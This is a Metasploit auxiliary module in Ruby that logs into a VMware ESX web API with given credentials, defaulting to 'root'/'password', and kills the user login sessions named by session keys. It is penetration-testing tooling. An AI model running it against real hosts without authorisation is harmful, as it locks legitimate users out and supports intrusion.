##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##


require 'msf/core'


class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::HttpClient
	include Msf::Auxiliary::Report
	include Msf::Exploit::Remote::VIMSoap

	def initialize
		super(
			'Name'           => 'VMWare Terminate ESX Login Sessions',
			'Description'    => %Q{
							This module will log into the Web API of VMWare and try to terminate
							user login sessions as specified by the session keys.},
			'Author'         => ['TheLightCosine <thelightcosine[at]metasploit.com>'],
			'License'        => MSF_LICENSE
		)

		register_options(
			[
				Opt::RPORT(443),
				OptString.new('USERNAME', [ true, "The username to Authenticate with.", 'root' ]),
				OptString.new('PASSWORD', [ true, "The password to Authenticate with.", 'password' ]),
				OptString.new('KEYS', [true, "The session key to terminate"])
			], self.class)
			
		register_advanced_options([OptBool.new('SSL', [ false, 'Negotiate SSL for outgoing connections', true]),])
	end

	def run

		if vim_do_login(datastore['USERNAME'], datastore['PASSWORD']) == :success
			Shellwords.split(datastore['KEYS']).each do |key|
				result = vim_terminate_session(key)
				case result
				when :notfound
					print_error "The specified Session was not found. Check your key: #{key}"
				when :success
					print_good "The supplied session was terminated successfully: #{key}"
				when :error
					print_error "There was an error encountered terminating: #{key}"
				end
			end
		else
			print_error "Login Failure on #{datastore['RHOST']}"
			return
		end
	end




end